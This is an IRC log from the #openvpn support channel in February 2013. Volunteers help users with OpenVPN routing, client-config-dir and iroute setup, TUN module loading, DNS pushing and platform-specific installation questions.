12:14 <@vpnHelper> Title: Two Factor authentication for OpenVPN on CentOS using Google Authenticator | Security Skittles Blog (at securityskittles.wordpress.com) 12:15 -!- Saviq [~Saviq@sawicz.net] has quit [Quit: ZNC - http://znc.sourceforge.net] 12:15 -!- master_of_master [~master_of@p4FF24E6E.dip.t-dialin.net] has joined #openvpn 12:16 -!- Saviq [~Saviq@canonical/saviq] has joined #openvpn 12:18 -!- MeanderingCode [~Meanderin@71-213-181-244.albq.qwest.net] has joined #openvpn 12:22 -!- MeanderingCode_ [~Meanderin@71-213-181-244.albq.qwest.net] has joined #openvpn 12:22 -!- MeanderingCode [~Meanderin@71-213-181-244.albq.qwest.net] has quit [Ping timeout: 264 seconds] 12:28 < dan__t> bloops. 12:39 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 12:39 -!- mode/#openvpn [+v s7r] by ChanServ 12:41 -!- dextro_ [~dextro_@65.110.29.202] has joined #openvpn 12:42 < dextro_> i am using client-config-dir /etc/openvpn/ccd 12:42 < dextro_> to ifconfig-push 10.8.0.6 10.8.0.5 12:43 < dextro_> to a cert called 'bell2' 12:43 < dextro_> but when a client cert 'bearclaw' which has no ccd signs on 12:43 < dextro_> it gets the ip 12:45 < dextro_> i dont want to ccd for 'bearclaw' because it has more than one machine using the cert and i dont want them all being forced to same ip 12:47 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has joined #openvpn 12:48 -!- mndo [~mndo@bl17-94-90.dsl.telepac.pt] has quit [Quit: going home] 12:51 -!- fu_fu [~Adium@c-107-3-50-191.hsd1.vt.comcast.net] has left #openvpn [] 12:53 < neilhwatson> IN bridged mode why would the server not be able to ping the client? Via the VPN the client exists on the server's network. Iptables are empty. 12:53 < neilhwatson> The client can ping the server and any hosts on that network. 12:54 <@krzee> dextro_, push an ip outside of the pool 12:57 * dextro_ slaps self 12:57 < dextro_> duh thanks lol 12:58 -!- brute11k [~brute@89.249.231.13] has joined #openvpn 12:59 < rob0> shared cert=bad idea 13:02 -!- master_of_master [~master_of@p4FF24E6E.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 13:03 -!- master_of_master [~master_of@p4FF24E6E.dip.t-dialin.net] has joined #openvpn 13:07 -!- Rolybrau [~Rolybrau@unaffiliated/rolybrau] has joined #openvpn 13:13 < neilhwatson> I have working bridged tunnel, ipv4. When I activate it ipv6 route table is altered. How can I prevent that? 13:17 < dan__t> once openvpn is in daemon mode, how can I terminate the connection, short of kill -9? 13:19 < rob0> see SIGNALS in the man page, also look at --management 13:19 < dan__t> management... 13:19 < dan__t> i was searching for "admin" 13:19 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 13:19 < dan__t> thanks. 13:35 -!- xxoxx [~xxoxx@tor/regular/xxoxx] has joined #openvpn 13:35 < xxoxx> hello 13:42 -!- Rolybrau [~Rolybrau@unaffiliated/rolybrau] has quit [Quit: Rolybrau] 13:45 -!- xxoxx [~xxoxx@tor/regular/xxoxx] has quit [Quit: Leaving] 13:46 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 13:53 -!- dextro_ [~dextro_@65.110.29.202] has quit [] 14:08 -!- brute11k [~brute@89.249.231.13] has quit [Quit: Leaving.] 14:16 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn 14:44 -!- WITRchris [~chris@unaffiliated/hyperactivecrond] has joined #openvpn 14:44 < WITRchris> this is a weird situation 14:44 < WITRchris> but say i've got a pfsense box behind NAT 14:44 < WITRchris> and i've got an openvpn server with a public ip 14:45 < WITRchris> is it possible to have clients connecting to the openvpn server be able to route through pfsense to its internal net? 14:45 < WITRchris> so like client (wherever) -> openvpn server -> pfsense -> internal net 14:45 < WITRchris> i would think that'd be a pretty common scenario 14:45 < rob0> pfsense as client? If so: 14:45 < rob0> !clientlan 14:45 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a 14:46 <@vpnHelper> better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 14:46 < WITRchris> yep 14:47 < WITRchris> thanks a lot rob0 14:56 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has joined #openvpn 14:58 < rob0> yw 15:04 -!- greyeax [~grey@cpe-108-185-215-179.socal.res.rr.com] has joined #openvpn 15:14 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 15:21 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [] 15:26 < WITRchris> hm 15:26 < WITRchris> i added another 'route' statement to my openvpn server's config 15:26 < WITRchris> but openvpn isn't adding a route as reported by netstat -r 15:32 < WITRchris> weird, it's pushing it to the clients though 15:32 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Quit: Leaving.] 15:34 < pekster> WITRchris: 'route' will add it to the system it's specified on, compard with a 'push "route ..."' statement that sends it to clients. Normally on a server you need both to support client LANs, and need to restart the service after making the change 15:34 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 15:35 -!- jackbrown [~se@93-44-76-167.ip96.fastwebnet.it] has quit [Quit: Sto andando via] 15:36 < WITRchris> right 15:36 < WITRchris> it appears to be failing to add the routes because it's trying to add the routes before the IP of the tunnel int is set up 15:37 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 272 seconds] 15:39 < pekster> WITRchris: This is on the openvpn server? Can you pastebin the logs? 15:39 < WITRchris> sure, sec 15:40 < WITRchris> http://pastebin.ca/2317645 15:42 < WITRchris> once stuff settles, 15:42 < pekster> Yea, I noticed weirdness with that page as it fails to load over IPv6, but works on my IPv4-only AWS proxy via openvpn 15:42 < WITRchris> http://pastebin.ca/2317647 15:43 < WITRchris> that's the netstat -r 15:44 < pekster> Can you also put your config up? OpenVPN is complaining it can't add the route due toa missing gateway, so you likely need to add that for the server and possibly push it to clients too 15:48 < WITRchris> yeah sec 15:49 < WITRchris> http://pastebin.ca/2317653 there's the config 15:52 -!- JSharpe [~JSharpe@10-253-3-31-anc.floodtel.net] has quit [Quit: Leaving] 15:52 < pekster> That's missing all the important bits like the network range and pushed options for clients 15:53 < WITRchris> hm 15:53 < pekster> That won't work as a server config file unless you're passing all the required options on the command-line 15:53 < WITRchris> wut 15:53 < WITRchris> it's... working now i think 15:53 < WITRchris> hang on 15:54 < WITRchris> assuming i didn't screw up 15:55 < WITRchris> it's working fine for the simple multiple clients -> one server config i have 15:57 < kisom> pekster: Did you give my config a go yet? :) 15:59 < pekster> WITRchris: That is not the full configuration that was called to generate the log output you linked. For instance, the pool setup on line 22 of the log output has no corresponding ifconfig-pool or server directive to support it 16:00 < WITRchris> weird 16:00 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 16:00 < WITRchris> maybe i miseed something 16:01 < pekster> How are you starting openvpn? If it's not via 'openvpn --config /usr/local/etc/openvpn.conf' or such, my guess is whatever init system you're using is adding the options. Assuming it even uses that config file to begin with, it'll have to append its own to work as a multi-client server 16:04 < WITRchris> oh i screweed up when i copypasted 16:04 < WITRchris> http://i.ccmo.me/openvpn.conf there 16:05 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 276 seconds] 16:05 < pekster> That's better. You don't need the route or push route for the 10.28.128.0/24 network as the server config option already handles that for you 16:06 < WITRchris> ok 16:07 < WITRchris> apparently i still need some gateway or something for 10.1.10.0 (the pfsense internal net) 16:07 < pekster> Is 10.1.10/24 behind a client then? And you have a matching ccd for it? 16:08 < WITRchris> yes 16:08 < WITRchris> the ccd is set for the client it's behind 16:08 < pekster> Should be 'iroute 10.1.10.0 255.255.255.0' in there 16:08 < WITRchris> yep 16:10 < pekster> The route belongs in the ccd too then 16:10 < WITRchris> so i have to add route 10.1.10.0 255.255.255.0 to that client's ccd? 16:11 < WITRchris> even though other clients are gonna have to be able to connect to it? 16:11 < pekster> Right, and remove that from the main config (but leave the push in there as your other clients need it) 16:12 < WITRchris> ok 16:12 < pekster> That causes the route to 10.1.10/24 to be dynamically added when the client connects, and the iroute tells openvpn to handle it internally via the VPN IP that client is assigned 16:12 < WITRchris> ah ok got it 16:13 < WITRchris> hm 16:13 < pekster> I suppose technically you can do it in the main config (so the route is there even if the client isn't connected) but that's sorta pointless, except maybe to avoid hitting the TTL as it bounces between the VPN server and an upstream gw that routes back to it. You'd need a 'route-gateway' statement though, since --server doesn't include one in subnet mode (see --server in the manpage for the expansion with subnet) 16:13 < WITRchris> i am getting Wed Feb 27 17:14:44 2013 pfsense.vmnet.roc0.chriscmolik.com/66.66.23.158:18633 OPTIONS IMPORT: reading client specific options from: ccd/pfsense.vmnet.roc0.chriscmolik.com 16:13 < WITRchris> Wed Feb 27 17:14:44 2013 pfsense.vmnet.roc0.chriscmolik.com/66.66.23.158:18633 Options error: option 'route' cannot be used in this context 16:15 < pekster> Oh, maybe you can't do that? I was pretty sure you used to be able to, but maybe I'm remembering that wrong (or I did that in a client-connect script) 16:15 < pekster> So, add 'route-gateway 10.28.128.1' to your server config and see if the route statement works out of the main config 16:16 < pekster> topology subnet doesn't give that to you automatically, for some reason 16:16 < WITRchris> ok 16:18 < WITRchris> ok looks good, clients are getting routes 16:18 -!- Orbi [~opera@109.129.8.111] has left #openvpn [] 16:18 < pekster> And your errors about the missing gw should be gone from the server log now 16:18 < WITRchris> and the server is picking up the 10.1.10.0 route 16:19 < WITRchris> yep 16:19 < WITRchris> just gotta get pfsense to actually route the traffic back 16:19 < pekster> So should that duplicate route if you removed the unnecessary route to the subnet's own network 16:19 < WITRchris> yeah i removed the unnecessary route 16:19 < pekster> That should take care of all the errors in the server then 16:20 < WITRchris> yep 16:20 < pekster> You also can remove the ifconfig-pool-persist option as it doesn't really serve a purpose and in rare conditions it's been known to cause issues (when something gets stuck in there that shouldn't, for whatever reason.) 16:21 < pekster> If you actually need static IPs, you're better off issuing them yourself in a ccd of client-connect script outside of the pool range 16:21 -!- EvilJStoker is now known as JStoker 16:23 < WITRchris> mhm 16:24 < WITRchris> aww yeah it worked after i added the int in pfsense and the gateway to 10.28.128.1 16:26 < WITRchris> i'm sure there's a way to push a client a dns server, right? 16:28 < pekster> See the --dhcp-option directive, although non-Windows requires client-side scripts to support it as it's only exposed as an environmental variable on Unix/Linux systems 16:28 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:29 < pekster> Windows passes it to the client during auto-config via the fake DHCP service openvpn exposes to the client 16:29 -!- roboman2444 [~roboman24@unaffiliated/roboman2444] has joined #openvpn 16:29 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn 16:29 < roboman2444> can i get openvpn to work without that annoying taskbar icon? 16:30 < roboman2444> on windows 16:30 < pekster> roboman2444: Under Windows? You can run it as a system service or directly from a command-line or system call from whatever frontend you want 16:30 < roboman2444> and that wont show the taskbar icon up? 16:30 < roboman2444> with programs today, i have like 40 taskbar icons 16:30 < roboman2444> i dont need another 16:30 < pekster> The icon is just the GUI frontend for openvpn 16:31 < roboman2444> ok 16:31 < WITRchris> yep 16:31 < pekster> You're free to start it another way, but the included OpenVPN GUI is controlled/managed solely through the taskbar icon 16:31 < WITRchris> got the dns server 16:31 < WITRchris> i should label a search domain too lol 16:45 -!- roboman2444 [~roboman24@unaffiliated/roboman2444] has quit [Ping timeout: 272 seconds] 16:47 -!- hotwings [hd@secksy.net] has left #openvpn [] 17:03 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 17:06 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:09 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 17:09 < pekster> kisom: No, but I should play with it and see if I can reproduce your results. I'll set a reminder for tonight after I pick up my car and see if I can give it a whirl: I'll drop any notes in the bugreport and ping you too 17:14 -!- WITRchris [~chris@unaffiliated/hyperactivecrond] has left #openvpn [] 17:18 * rob0 wants to watch pekster pick up a car! 17:18 < rob0> better yet: to pick it up and whirl it! Wow! 17:19 < pekster> Just let me rig it to a few carabiners and pulleys first :) 17:19 < rob0> cheater :( 17:22 < pekster> cd openvpn; ./configure --with-car-stunts 17:32 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 17:33 -!- ploo [~lbz@c-71-196-252-82.hsd1.co.comcast.net] has joined #openvpn 17:33 < ploo> do people use ask-pass? 17:47 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 17:47 -!- mode/#openvpn [+o krzee] by ChanServ 18:06 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 18:28 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 252 seconds] 18:34 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 18:39 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has quit [Ping timeout: 276 seconds] 18:56 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 272 seconds] 19:02 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 19:03 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 19:11 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 19:16 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Remote host closed the connection] 19:17 -!- JStoker is now known as Guest64683 19:19 -!- Guest64683 [jstoker@unaffiliated/jstoker] has left #openvpn [] 19:19 -!- JStoker2 [jstoker@unaffiliated/jstoker] has joined #openvpn 19:19 -!- JStoker2 is now known as EvilJStoker 19:29 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 19:30 -!- raidz is now known as raidz_away 19:44 < greyeax> is there any other way to have openvpn authenticate against openldap other than openvpn-auth-ldap plugin? because it apparently does not want to build on my machine. 19:52 <@krzee> sure, any script you write will work 19:52 <@krzee> (if your script works) 19:52 <@krzee> !script 19:52 <@vpnHelper> "script" is see http://openvpn.net/index.php/open-source/documentation/manuals/69-openvpn-21.html#lbAR for a list of places scripts can hook into openvpn 19:52 <@krzee> !authpass 19:52 <@vpnHelper> "authpass" is (#1) please see --auth-user-pass-verify in the manual to learn how to force clients to use passwords in addition to certs or (#2) or to ONLY use passwords (no certs, highly NOT recommended) also use --client-cert-not-required or (#3) and if you want the login name to be used as the common-name for things like ccd entries, use --username-as-common-name 19:58 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has left #openvpn [] 20:07 -!- rooth [tomte@stuck.in.the.basement.at.fritzl.nu] has joined #openvpn 20:12 -!- Aprogas [aprogas@enki.aprogas.net] has joined #openvpn 20:12 < Aprogas> !welcome 20:12 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 20:12 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 20:13 < Aprogas> !topology 20:13 <@vpnHelper> "topology" is (#1) it is possible to avoid the !/30 behavior if you use 2.1+ with the option: topology subnet This will end up being default in later versions. or (#2) Clients will receive addresses ending in .2, .3, .4, etc, instead of being divided into 2-host subnets. or (#3) See http://osdir.com/ml/network.openvpn.devel/2005-09/msg00020.html for more history on this. 20:14 < Aprogas> !/30 20:14 <@vpnHelper> "/30" is (#1) Default behaviour assigns a /30 subnet(4 addresses) to each peer. See http://goo.gl/6vemm for background or (#2) you can avoid this behavior by reading !topology or (#3) by default, first client is .6, then .10 .14 .18 etc or (#4) use openvpn --show-valid-subnets to see the subnets you can use in net30 or (#5) tl;dr Windows sucks, use --topology subnet in your server.conf 20:26 < Aprogas> !interface 20:26 <@vpnHelper> "interface" is (#1) paste interface configuration from both client and server, while being disconnected and when beeing connected. Be sure to also add the routing tables for both situations from client and from server or (#2) in windows: ipconfig /all - unix: ifconfig -a , and for routing tables: netstat -rn 20:30 -!- p3rror [~mezgani@41.140.38.124] has quit [Ping timeout: 248 seconds] 20:33 -!- brute11k [~brute@89.249.230.53] has joined #openvpn 20:51 -!- MeanderingCode_ [~Meanderin@71-213-181-244.albq.qwest.net] has quit [Read error: Operation timed out] 20:51 -!- devslash [~devslash@unaffiliated/devslash] has joined #openvpn 20:51 < devslash> i installed openvpn on my linux server 20:51 < devslash> i want to connect from android. which files do i need to copy to the client ? 20:53 < devslash> is anyone here ? 21:00 -!- pinion [~pinion@unaffiliated/pinion] has joined #openvpn 21:01 < pinion> !welcome 21:01 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 21:01 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 21:07 < pekster> devslash: did you see: 21:07 < pekster> !howto 21:07 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 21:07 < devslash> yea 21:08 < devslash> thanks 21:09 < pinion> I would like to access an internal webhost from my iphone. I barely know what I'm doing but I got openvpn configured and running on openwrt and I'm able to connect from my iphone on LTE. The issue is I can only get to certain hosts eg 192.168.2.69:8081 or 8082 but I can't get to 192.168.2.69:80 21:09 < pekster> Besides the client-centric config, the client needs the ca.crt from the PKI you created (assuming you're using TLS mode, which is recommended) and its own keypair (so the key and cert the PKI generated from the public key) 21:09 < pinion> Server cfg: http://pastebin.com/qznjH9bp 21:11 < pinion> And apparantly the log was set to go to a location that doesn't exist... 21:12 < pekster> pinion: On OpenWRT you probably either want to let it log to syslog (ie: the circular buffer OpenWRT keeps in RAM) or on a mounted USB partition, otherwise you're going to be doing a lot of write to the internal flash and growing the log since you used -append 21:13 < pekster> I see you're redirecting the gateway too, which should be sufficient to reach an internal LAN; you need a return route so the LAN client can get back to the VPN network. Is the VPN server also the LAN's default gateway? (that would take care of the return route) 21:14 < pekster> Also, I need to give you some bonus points for posting a real config and not the OpenWRT UCI mess ;) 21:14 < pinion> Thanks :), give me a minute to chew on this 21:15 < pinion> the vpn server isn't the lans default gateway, no 21:15 < pekster> In that case your LAN's gw needs a return route that sends traffic bound for the VPN client network range via the VPN server 21:16 < pekster> (otherwise the return traffic gets routed upsteam in a typical home network setup where that gw has its own default route) 21:17 < pinion> Cool I'll check that out, the log is going to an external usb drive.. but I still don't really want it doing that I don't think. thanks for the syslog tip 21:17 < pinion> and I'll google around on openwrt about the default gateway 21:19 < pekster> It's fine if your VPN server (whatever it is running on) isn't the default gw for LAN clients, but then the gw that is needs a return route. See: 21:19 < pekster> !serverlan 21:19 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png 21:20 < devslash> when i try to do openvpn /etc/openvpn/server.conf i get an error "ERROR: Cannot open TUN/TAP dev /dev/net/tun: No such device (errno=19)" 21:20 < devslash> I loaded the tun module 21:20 < devslash> and /dev/net/tun does exist 21:21 < pekster> Not running as root perhaps, lacking permission to read it? 21:21 < devslash> i am root 21:22 < devslash> i do have a firewall 21:22 < devslash> shore wall. do I need to allow access to it ? 21:23 < devslash> hmm 21:23 < devslash> i don't think the tun module loaded. i don't see it in the output of lsmod 21:25 < pekster> if it's a module you should; if it's built into the kernel you won't see it there 21:26 < pekster> If you have config.gz support, this will tell you: zgrep CONFIG_TUN /proc/config.gz 21:26 < devslash> i think i need to load the module 21:26 < devslash> its set as a module 21:26 < devslash> ONFIG_TUN=m 21:26 < devslash> err CONFIG_TUN=m 21:26 < pekster> 'modprobe tun' then 21:27 < devslash> i did 21:27 < devslash> no error 21:27 < devslash> but if I do lsmod it doesn't appear to have loaded 21:27 <@ecrist> evening, kids 21:28 < devslash> any idea ? 21:29 < pekster> modprobe shouldn't exit cleanly if it failed to load the module. Try insmod instead? 21:29 < pinion> pekster: My hero. I just had to set up the firewall zone settings, add a new zone (eg VPN), and do some "inter-zone forwarding" 21:29 < pinion> Appears to be working great now, thanks for the help 21:29 < devslash> just ins mod tun ? 21:30 < pekster> I think it needs a full path to the module, but It's been a while since I've used it 21:32 < pekster> Yea, looks like my insmod eats it like that; check for the .ko module file at /lib/modules/`uname -r`/kernel/drivers/net/tun.ko 21:33 < pekster> modprobe "shouldn't" give you a zero exit-code if it failed; it'll return success silently though if the module is loaded (and you should thus see it with: lsmod | grep tun) 21:50 -!- devslash [~devslash@unaffiliated/devslash] has quit [Quit: devslash] 21:51 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 21:58 -!- brute11k [~brute@89.249.230.53] has quit [Quit: Leaving.] 22:04 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has quit [Ping timeout: 245 seconds] 22:05 -!- MorgyN [~mig@island.morgyn.org] has quit [Ping timeout: 255 seconds] 22:05 -!- mcp [~mcp@wolk-project.de] has quit [Ping timeout: 264 seconds] 22:05 -!- pcdummy [~quassel@unaffiliated/pcdummy] has quit [Ping timeout: 245 seconds] 22:11 -!- pcdummy [~quassel@mx1.page4me.ch] has joined #openvpn 22:11 -!- pcdummy [~quassel@mx1.page4me.ch] has quit [Changing host] 22:11 -!- pcdummy [~quassel@unaffiliated/pcdummy] has joined #openvpn 22:17 -!- MorgyN [~mig@island.morgyn.org] has joined #openvpn 22:18 -!- sedulous [~sedulous@unaffiliated/sed/x-0159859] has joined #openvpn 22:19 -!- devslash [~devslash@unaffiliated/devslash] has joined #openvpn 22:20 -!- mcp [~mcp@wolk-project.de] has joined #openvpn 22:43 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has left #openvpn [] 22:45 < devslash> i just set up openvpn in arch linux and Im using shorewall. Do i need to open a port in shorewall? 22:48 < pekster> That depends greatly on your firewall setup. The encapsulated OpenVPN traffic operates over a single port, UDP port 1194 by default and IANA standard 22:56 -!- devslash [~devslash@unaffiliated/devslash] has quit [Quit: devslash] 23:04 -!- devslash [~devslash@unaffiliated/devslash] has joined #openvpn 23:13 -!- n2deep [n2deep@odin.sdf-eu.org] has quit [Ping timeout: 252 seconds] 23:16 < devslash> i configured openvpn on my linux server, copied the necessary files to my client (android device running openvpn client). when i connect within my pan it appears to connect correctly. when i connect from my client it says no route to host 23:26 -!- md_5 [md_5@mcdevs/trusted/md-5] has quit [Ping timeout: 260 seconds] 23:27 -!- n2deep [n2deep@odin.sdf-eu.org] has joined #openvpn 23:33 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 23:53 -!- Visitorer [~Visitorer@unaffiliated/visitorer] has joined #openvpn 23:53 < Visitorer> user@domain:~/conf/OpenVPN/examples/easy-rsa$ ./build-ca 23:53 < Visitorer> ./build-ca: line 8: ~/conf/OpenVPN/examples/easy-rsa/pkitool: No such file or directory 23:53 < Visitorer> but pkitool is there 23:58 -!- devslash [~devslash@unaffiliated/devslash] has quit [Quit: devslash] --- Day changed Thu Feb 28 2013 00:12 < Visitorer> Jesus Christ, nothing's ever working right 00:17 < Visitorer> bleh, nvm, gave up on trying to change the directories.. 00:37 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 00:38 -!- mode/#openvpn [+o krzee] by ChanServ 00:46 -!- feth [~feth@ile-flottante.tuttu.info] has quit [Ping timeout: 255 seconds] 00:46 -!- feth [foobar@ile-flottante.tuttu.info] has joined #openvpn 00:55 -!- TriJetScud [~TriJetScu@2001:470:e97f:1003:215:5dff:fe07:4806] has joined #openvpn 00:55 < TriJetScud> #tunortap 00:55 < TriJetScud> !tunortap 00:55 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against 00:55 <@vpnHelper> you over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 01:24 < Visitorer> so I want to set this up on my VPS for LAN gaming 01:25 < Visitorer> but I have no idea how to configure bridge-start 01:25 < Visitorer> if I do ifconfig, I have no eth0 device 01:27 < Visitorer> hm.. nvm... apparently I can't 01:27 < Visitorer> oh well 01:27 -!- Visitorer [~Visitorer@unaffiliated/visitorer] has left #openvpn ["8V"] 01:36 -!- EvilJStoker is now known as JStoker 01:38 -!- local [~local@HSI-KBW-095-208-244-144.hsi5.kabel-badenwuerttemberg.de] has joined #openvpn 01:39 -!- RichardBronosky [~RichardBr@ec2-50-17-28-78.compute-1.amazonaws.com] has quit [Ping timeout: 255 seconds] 01:40 < local> hello everybody. I am referring to the official HowTo (http://openvpn.net/index.php/open-source/documentation/howto.html#scope) at the topic "Including multiple machines on the client side when using routet vpn (dev tun)": 01:40 <@vpnHelper> Title: HOWTO (at openvpn.net) 01:41 -!- uberushaximus [~uberushax@hacked.thegov.us] has quit [Ping timeout: 255 seconds] 01:41 < local> Is there a way so I do NOT HAVE to use the client-config-dir line in server.conf? Can I somehow manually assign the iroute for just a single client VPN network which should connect to the server? 01:41 -!- RichardBronosky [~RichardBr@ec2-50-17-28-78.compute-1.amazonaws.com] has joined #openvpn 01:41 -!- uberushaximus [~uberushax@hacked.thegov.us] has joined #openvpn 01:46 -!- local [~local@HSI-KBW-095-208-244-144.hsi5.kabel-badenwuerttemberg.de] has left #openvpn [] 01:50 -!- sh_t [~sht@176.222.238.158] has quit [Ping timeout: 276 seconds] 01:54 -!- sh_t [~sht@176.222.238.158] has joined #openvpn 01:58 < EugeneKay> Nope. 02:08 -!- dazo_afk is now known as dazo 02:18 -!- Visitorer [~Visitorer@unaffiliated/visitorer] has joined #openvpn 02:19 < Visitorer> isn't there a way to install OpenVPN without Tunnelblick or any GUI? 02:19 < Visitorer> on Mac 02:19 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 02:20 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 02:26 -!- devslash [~devslash@unaffiliated/devslash] has joined #openvpn 02:26 -!- devslash [~devslash@unaffiliated/devslash] has quit [Client Quit] 02:40 -!- mattock_afk is now known as mattock 02:43 <@krzee> Visitorer, sure 02:43 <@krzee> !osxtun 02:43 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 276 seconds] 02:43 <@krzee> !osxtuntap 02:44 <@krzee> !factoids search osx 02:44 <@vpnHelper> 'osxipforward', 'osxboot', and 'osx' 02:44 <@krzee> well you'll need tuntap drivers installed seperately 02:44 <@krzee> or you can pull the kext from tunnelblick 02:46 < Visitorer> actually, I want to avoid using tunnelclick's drivers, if I am to believe what this guy wrote here : http://blog.remibergsma.com/2012/08/03/openvpn-on-mountain-lion-tunnelblick-alternative-viscosity-to-the-rescue/ they are problematic on Mountain Lion 02:46 < Visitorer> I don't have Mountail Lion myself but the person who I want to connect with does and I want to avoid trouble for them 02:47 <@krzee> ive used in on 10.8 on someones machine and i believe ecrist uses it there 02:50 < Visitorer> hm.. I'll have him give it a try then 03:16 -!- zz_AsadH is now known as AsadH 03:31 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has joined #openvpn 03:40 <@krzee> !blame 03:40 <@vpnHelper> "blame" is (#1) According to Bushmills, it's always krzee's fault or (#2) According to krzee, it's always dazo's fault or (#3) and dazo will always blame EugeneKay, Bushmills, ecrist or any other sensible victims in the required moments 03:41 <@krzee> !learn blame as cron2 says its always d12fk's fault (and sometimes the customers) 03:41 <@vpnHelper> Joo got it. 03:42 -!- sqwerty [~sqwerty@unaffiliated/sqwerty] has quit [Ping timeout: 272 seconds] 03:45 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 03:47 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 04:01 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Max SendQ exceeded] 04:02 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 04:02 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn 04:03 -!- krzie [nobody@openvpn/community/support/krzee] has joined #openvpn 04:03 -!- mode/#openvpn [+o krzie] by ChanServ 04:03 -!- krzie [nobody@openvpn/community/support/krzee] has left #openvpn ["Leaving"] 04:03 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 04:04 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 04:04 -!- mode/#openvpn [+o krzee] by ChanServ 04:06 -!- greyeax [~grey@cpe-108-185-215-179.socal.res.rr.com] has quit [Read error: Connection reset by peer] 04:07 -!- greyeax [~grey@cpe-108-185-215-179.socal.res.rr.com] has joined 